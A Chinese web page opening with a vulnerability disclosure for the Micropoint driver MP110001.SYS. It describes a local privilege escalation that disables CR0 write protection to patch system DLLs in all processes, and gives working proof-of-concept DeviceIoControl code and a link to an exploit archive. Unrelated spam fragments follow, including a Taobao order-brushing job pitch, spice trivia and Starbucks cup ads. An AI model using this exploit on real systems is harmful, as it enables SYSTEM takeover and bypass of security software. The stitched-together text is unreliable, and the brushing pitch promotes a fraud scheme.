微点主动防御是一款号称使用行为分析技术实时保护的主动防御软件。 其核心驱动MP110001.SYS最新版本存在本地权限提升漏洞,可导致任何权限的用户在本地提升权限到SYSTEM权限,绕过UAC等保护。同时也可以利用此漏洞注入到任何受保护进程,从而穿透防火墙、主动防御软件。 出问题的组件:MP110001.sys,版本号:1.2.10006 CheckSum = 0x00009F60 TimeStamp = 0x43620505该驱动提供了一个接口,允许RING3程序将一块数据COPY到地址0-0x80000000的任意 地址,在写入时会将寄存器CR0的第16位置0,此时CPU的页保护机制就会失效,WINDOWS NT 的CopyOnWrite机制也将失效,RING3程序可以将内存写入到系统模块,例如kernel32.dll, user32.dll的地址,改写它们的代码,此时对系统DLL代码的改写会在所有进程体内同时生效. 通过这一接口,任何权限的RING3程序就可以HOOK或旁路系统任何进程的函数调用,从而进行权限提升,如果HOOK进主动防御、防火墙等的进程体内,则可绕过主动防御软件的保护。 测试代码:HANDLE hdev = CreateFile("\\\\.\\MP110001" ,FILE_READ_ATTRIBUTES ,FILE_SHARE_READ |FILE_SHARE_WRITE ,0,OPEN_EXISTING ,0,0); if (hdev == INVALID_HANDLE_VALUE){ CHAR xx[100];sprintf(xx , "create err = %u\n" , GetLastError());MessageBox(xx, 0 , 0 );return ;} CHAR xx[] = "hello mp!"; HMODULE p = GetModuleHandle("ntdll.dll"); ULONG btr ; BOOL bret = DeviceIoControl(hdev ,0x220007,(PVOID)((ULONG)p + 2 ),strlen(xx)+1 ,xx,0,&btr ,0); CloseHandle(hdev); 测试代码会向NTDLL.DLL的DOS头第二个字节开始写入一个字符串“hello mp",此修改将在系统任何进程体内生效,可使用OD、WINDBG,WINHEX等工具查看 测试程序下载:http://mj0011.ys168.com 漏洞演示目录下LOCALexp_MP.rar
http://wap.acfun.tv操作机:Windows XP [.16.11.2] return array( 中断网络嗅探。 Options :图7P2P方式存有的一些安全性的问题...
目前淘宝刷单兼职已经成了一种流行趋势,淘宝刷单不交会费保证金肯定是骗人的,正规平台都是要先收取一定费用的,当然也有骗子的存在,那如何找到正规平台呢?我来为你分析为何要收费 多大学生、全职妈妈想利...
草寇在调料中的作用,可以当做香料供人们食用,草寇也叫假砂仁或者圭砂仁,它是多年生植物草寇的种子,多在每年8到11月之间采收采收以后晒干,可以当做香料,供人们食用。能起到提味增鲜和去除异味等多种功效...
希望这只是部门西席的行为, 虽然我的先生们也说脏话,然则强行要礼物的还没见过。 IOS链接 新闻原链接: 中学班主任因西席节没礼物 飙脏话训学生一节课 ...
本文导读目录: 1、有没有好看的美国电影 2、绿巨人是不是笑的过于嚣张了些,看十遍依旧好看 3、请向我推荐一些有气质的,有男人味的外国男影星!多多益善 4、有哪些青春类型小说推荐? 5...
星巴克咖啡的水杯是长相十分高的,尽管价钱较为贵,立刻便是二月七夕节了,星巴克咖啡每一年也会发布限制款的水杯。2020年七夕节款依然漂亮。2020星巴克咖啡情人节限定杯何时能够买 2020星巴星巴克咖...